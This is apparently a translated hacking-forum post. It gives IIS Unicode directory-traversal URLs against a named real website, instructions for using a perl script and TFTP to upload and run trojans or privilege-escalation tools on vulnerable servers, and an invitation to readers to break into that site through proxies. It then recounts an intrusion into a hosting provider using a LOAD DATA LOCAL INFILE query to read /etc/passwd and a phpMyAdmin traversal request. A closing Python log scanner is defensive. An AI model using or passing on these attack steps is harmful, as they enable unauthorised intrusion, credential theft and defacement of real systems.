How to identify the bug and how to break into the server's hard drive I already covered in the previous post. Let's assume you have already broken into that site's hard drive. To download a file, use the type command (DOS's view-file-contents command). For *.html and *.txt files it will show the contents; for files that cannot be viewed, a window asking to Save to disk will appear (not every server lets you do this; it depends). Example: I want to download a file from www.tnh.com.vn (I only practise on this one). I type http://www.tnh.com.vn/_vti_bin/..%c0%af..%...ype+c:\name-of-file-to-download . Please don't overdo it or wreck the sites too badly.

P/S: Hacking IIS is fine, but wandering the Internet I see that most sites use Apache. I am practising hacking Apache servers. I currently have a document teaching Apache hacking which I find fairly easy to follow.... But when I try it I never get anywhere; I don't know whether that server is patched or I am just dumb. Anyone who knows how to hack Apache, please show us.... FPT's website also uses IIS, but unfortunately it has been patched.

UPLOADING FILES TO AN IIS SERVER

I will continue by showing you how to upload files to an IIS that has the bug. I did not write this; I only picked it up and, finding it interesting, am posting it for you. First download the code (again called Unicode) from: http://www.cners.com/tools/unicode.zip

Run the file tftpd32.exe (or tftpd.exe, I forget); if it's unclear just rename so that you have both files tftpd.exe and tftpd32.exe. Run it, then look at the IP number and write it down. Open the file uniexe.pl in Notepad and change xxx.xxx.xxx.xxx to the IP you just got from tftpd. Edit the parameters on the same line as the xxx.xxx.xxx.xxx you just filled in:
+ change "GET ncx99.exe" to "GET yyy.zzz", where yyy.zzz is a file on your hard drive
+ change the part C:\inetpub\scripts to the path of the folder you want to upload the file to

See the following example to make it clearer:
#You need to change the xxx.xxx.xxx.xxx to your ip address. Duh!
$command="tftp -i 202.162.63.126 GET index.htm c:\\inetpub\\wwwroot\\index.htm";
---> In the example above I copied a file in my C:\ folder (my IP being 202.162.63.126) to C:\inetpub\wwwroot\ on the server affected by the unicode bug. Then go out to DOS and type perl, the server's IP:port. Example: perl uniexe.pl 202.162.45.78:80 If there are no problems, the file has been uploaded to the server. Note: besides uploading *.html files, you can also upload remote access trojans or getadmin programs for WinNT to seize admin rights and then run wild on this server. To run a file on the server, go to DOS and type: perl uniexe.pl the-website's-ip:port name-of-file-to-run (with full path).

P/S: Not every server lets you create, move or run things on it. It depends on the admin. Some of you said that scanning did not detect any bug; it has probably been fully patched. You will have to look for another website.... As far as I know, Thai websites use IIS a lot. I am practising, so I don't need many servers; currently I practise on http://www.tnh.com.vn/ Anyone who wants to can go into its hard drive and practise by copying the following code into the browser's address bar: http://www.tnh.com.vn/_vti_bin/..%c0%af..%.../c+dir+c:\ Go in and create a folder HKC-LPTV. Oh, I forgot: to be safe, use proxies to get into this machine.

After a busy spell (anyway, for those who really want to know what I have done in the last three months, pay a visit to http://www.phpmvc.net , a PHP port of Jakarta Struts), mrro finally has a little free time; actually it is because today, leafing through some old folders marking a *glorious era* from the past, I suddenly came across a rather amusing file, so I am bringing it here to tell everyone about it. Hihi, just for fun.

A minute for the rules of the game: all the information about security bugs in this article has been reported to the parties concerned, and as of now the holes have been fixed. (Some passages in this article are embellished fiction.) Now let's begin....

Act 1: Three firewalls, very professional, no amateur could ever hack it!

One dark evening early last August, while sitting in the office at the Tuoi Tre newsroom, someone suddenly walked in. It turned out to be the deputy editor-in-chief, and with him were two or three other people, said to be colleagues from the Sai Gon Giai Phong paper on a visit. "Let me introduce you, gentlemen: Tuoi Tre's hacker," the boss said, pointing straight at me. Good grief, I wanted to die of embarrassment! Up to now, mrro has been most afraid of two things: (1) someone asking "hey, do you know how to hack Yahoo! Mail?" and (2) being called a hacker. What times we live in; a *hacker* is more precious than gold. The moment the word *hacker* came up, a man from SGGP jumped over, put an arm round my shoulder and stared into mrro's face (checking whether he looked human?!). "He is about to ask me to hack this or that again," mrro silently cursed. Sure enough:
- A hacker, eh? Some day try hacking www.sggp.org.vn, go ahead and hack it as much as you like, wreck it if you want, hihi, we are planning to redo that website anyway. The journalist grinned as he spoke.
- Oh no, don't listen to my boss, I don't know anything about hacking. mrro stammered in reply.
- Just kidding; how could an amateur hack it? The SGGP website was built by VDC, extremely professional; their servers are built with 3 or 4 somethings, I think they are firewalls, extremely secure, never attacked so far. The journalist boasted cheerfully.
Something burned hot in mrro's ears. As soon as he wheeled his bike home and locked the door, mrro ran straight upstairs and switched on the computer. "Damn it, let's see how solid those three firewalls are," he cursed. "Tè te tè te", the sound of the modem in the dead of night, like a six-string guitar, quite pleasant to the ear. "www.sggp.org.vn[enter]"; first, see what the website looks like. Hmm, a news site like any other, written in PHP, hihi, even the script names are Vietnamese (doctintuc.php where readnews.php would be better), simple layout, not very professional, probably because it was built long ago, as the journalist said. Heh, fun ahead: if the outside of a website is done like this, the inside probably has a couple of paper firewalls too, mrro grinned.
Go to Netcraft to see what the server is: "www.netcraft.com/whats". Hmm, a machine running RedHat Linux 7.2 with Apache 1.3.23/mod_php4. Hihi, the software is not very *up2date* either; well, KISS (Keep It Simple, Stupid!), admins tend to follow that rule. Never mind, deal with it later; an *amateur* like mrro is not in the habit of hacking through system software bugs, he prefers hacking through the mistakes of *professional* admins and programmers. Poking at a few URLs, he quickly saw that this website used Oracle as its backend database. PHP and Oracle, an interesting combination. Without much experience hacking Oracle database servers, mrro noted this in the file sggp.org.vn.txt for when it might be needed (hihi, every time mrro does something he writes it down in a file, and the file he found again today is this sggp.org.vn.txt). nmap? Not yet. Drop by Google first. mrro typed the keywords VDC Hosting; this website is hosted at VDC, so try his luck. Hmm, the first result: TeleHosting <http://hosting.vnn.vn>. Drop in and see whether there is anything interesting. Hmm, a decent-looking website, tidy layout. After a few steps, mrro renamed sggp.org.vn.txt to hosting.vnn.vn.txt and added some information (all of which can be found right on the index page and on Netcraft):
- Telehosting: <http://hosting.vnn.vn>
- IP address: 203.162.96.70 (same IP as sggp.org.vn => shared hosting)
- Apache/2.0.47 (Unix) PHP/4.3.0 JRun/4.0 mod_jk/1.2.3-dev on Linux
- Control Panel: <http://hosting.vnn.vn/customers/>
- Demo account: cpvdc2/demo

Hihi, professional indeed, even handing out a demo account. mrro tried the Control Panel with that account. The Control Panel offers management tools such as Update information, Send request, FTP, FileManager, MySQL, Webmail... quite a lot. Heh, looks tasty. mrro eagerly jumped into FTP: *Permission denied*. FileManager, the same. But then salvation arrived: MySQL allowed access, hihi, and led mrro to phpMyAdmin, the MySQL management tool. Half the journey done, mrro laughed with glee. His confidence had a reason: with MySQL and phpMyAdmin he could do plenty with this server, simply because he could already run queries on this machine. Besides, a phpMyAdmin version as old as this (2.3.2) was sure to have bugs; who knows, with luck there might be one that let him run commands on this server. Now, search for phpMyAdmin bugs first, or hack MySQL first?
Why not do both at once, hehe, that's probably better. No sooner thought than done: mrro opened two browser windows (FYI, it's Firefox), in one he went to Bugtraq and searched for the keyword phpMyAdmin, in the other he logged into phpMyAdmin with the demo account. Once inside phpMyAdmin, as fast as if it had been pre-programmed, mrro typed the query: CREATE TABLE test(id INT,text LONGTEXT); LOAD DATA LOCAL INFILE '/etc/passwd' INTO TABLE test FIELDS ESCAPED BY ''; SELECT * FROM test; and hit enter, and a screen full of all the usernames on the system appeared right in front of him, yahoo! Hehe, with this phpMyAdmin mrro will be able to read plenty of files on the system. Carefully saving this information, mrro asked himself: what's the goal now? Either upload a file, or get the username and password of a user on the system. He started to analyse. On a shared hosting server like this, there will surely be accounts whose username and password are the same. That's one direction. The second direction is to get into the database holding the customer data. Once that database is reachable, everything becomes very easy; it will certainly be full of the usernames and passwords mrro is looking for. These *professional* admins will surely have written their own customer management tool, so all that's needed is the MySQL username and password to get into the database. And usually that username and password will be stored in some config.php file, that's what PHP coders tend to do. Hehe, the only remaining problem is how to find the path of that file. mrro decided to go down the second path first, simply because it looked more appealing, even though the first path looked easier. What next? Oh wait, first see whether anything turned up on Bugtraq. Well, there are a few bugs, nothing too serious, it seems to be all XSS. Just as he was about to close the Bugtraq window (mrro isn't really into that stuff anyway), one bug caught his eye: phpMyAdmin XSS Vulnerabilities, Transversal Directory Attack, Information Encoding Weakness and Path Disclosures (http://www.securityfocus.com/archive/1/325641). Path Disclosures and Transversal Directory Attack, hehe, now this is interesting. Having saved the link, mrro clicked through to the details of the bug. And that's it, game over! The Transversal Directory Attack bug allows listing the contents (files and subfolders) of any folder on the system (precisely, any folder the apache user may read). Quickly exploiting this bug together with the Path Disclosure, mrro typed http://hosting.vnn.vn/Admin/db_details_imp...ath=/opt/daiweb <http://hosting.vnn.vn/Admin/db_details_importdocsql.php?submit_show=true&do=import&docpath=/opt/daiweb> Hehe, and there it was, right in front of him, a file named connect.php, exactly as mrro had predicted.
Then the LOAD DATA INFILE trick again, and done! --mrro.

Having read this piece, how do you feel?? Fun? I found it great fun; I already thought hacking was fun and now it's even more so. Real hackers (or people who know how to hack) in Vietnam rarely write up their hacks in such a cheerful way afterwards. Some time ago Huyremy once wrote up the process of hacking HVA, but it wasn't much fun, and besides, Huy only ever wrote that one piece.... Whenever I find another write-up as fun as this one I'll introduce it to you all! Have fun! The End
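From the defender's side, here is an added example (my own, not part of mrro's post and not code from MySQL or phpMyAdmin) that scans constructed MySQL general-log and Apache access-log lines for the two moves in the story: LOAD DATA LOCAL INFILE pulling a server file into a table, and a phpMyAdmin import request whose docpath points outside the docs directory. The import directory /var/lib/mysql-files/ and the log lines are assumptions made for the example.

```python
import re
from urllib.parse import urlparse, parse_qs

# Assumed server-side import directory (MySQL secure_file_priv); hypothetical value.
ALLOWED_IMPORT_DIR = "/var/lib/mysql-files/"
# Constructed sample log lines, not real logs, shaped like the story's activity.
MYSQL_LOG = """\
040312 10:02:40    9 Query   CREATE TABLE test(id INT,text LONGTEXT)
040312 10:02:41    9 Query   LOAD DATA LOCAL INFILE '/etc/passwd' INTO TABLE test FIELDS ESCAPED BY ''
040312 10:05:03   12 Query   LOAD DATA INFILE '/var/lib/mysql-files/import.csv' INTO TABLE orders
040312 10:07:19   12 Query   LOAD DATA INFILE '/tmp/upload.csv' INTO TABLE orders
"""
ACCESS_LOG = """\
10.0.0.5 - - [12/Mar/2004:10:06:10 +0700] "GET /Admin/db_details_importdocsql.php?submit_show=true&do=import&docpath=/opt/daiweb HTTP/1.1" 200 4211
10.0.0.5 - - [12/Mar/2004:10:06:30 +0700] "GET /Admin/db_details_importdocsql.php?do=import&docpath=docs HTTP/1.1" 200 812
10.0.0.9 - - [12/Mar/2004:10:07:00 +0700] "GET /index.php HTTP/1.1" 200 1209
"""
LOAD_DATA_RE = re.compile(r"LOAD\s+DATA\s+(LOCAL\s+)?INFILE\s+'([^']*)'", re.IGNORECASE)
REQUEST_RE = re.compile(r'"(?:GET|POST)\s+(\S+)\s+HTTP/')


def scan_mysql_log(text):
    """(line_no, reason) for each LOAD DATA that reads a file it should not: LOCAL reads
    whatever the client names (fix: local_infile=0); non-LOCAL is only expected from the import dir."""
    hits = []
    for n, line in enumerate(text.splitlines(), 1):
        m = LOAD_DATA_RE.search(line)
        if not m:
            continue
        local, path = m.group(1), m.group(2)
        if local:
            hits.append((n, f"LOAD DATA LOCAL INFILE of {path}"))
        elif not path.startswith(ALLOWED_IMPORT_DIR):
            hits.append((n, f"LOAD DATA INFILE outside {ALLOWED_IMPORT_DIR}: {path}"))
    return hits


def scan_access_log(text):
    """(line_no, reason) for phpMyAdmin import requests whose docpath is absolute or climbs with '..'."""
    hits = []
    for n, line in enumerate(text.splitlines(), 1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        url = urlparse(m.group(1))
        if not url.path.endswith("db_details_importdocsql.php"):
            continue
        for docpath in parse_qs(url.query).get("docpath", []):
            if docpath.startswith("/") or ".." in docpath.split("/"):
                hits.append((n, f"docpath escapes the docs directory: {docpath}"))
    return hits
```

On a shared host the same two checks map to hardening: set local_infile=0 and secure_file_priv on the MySQL side, and keep phpMyAdmin patched and off demo accounts.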
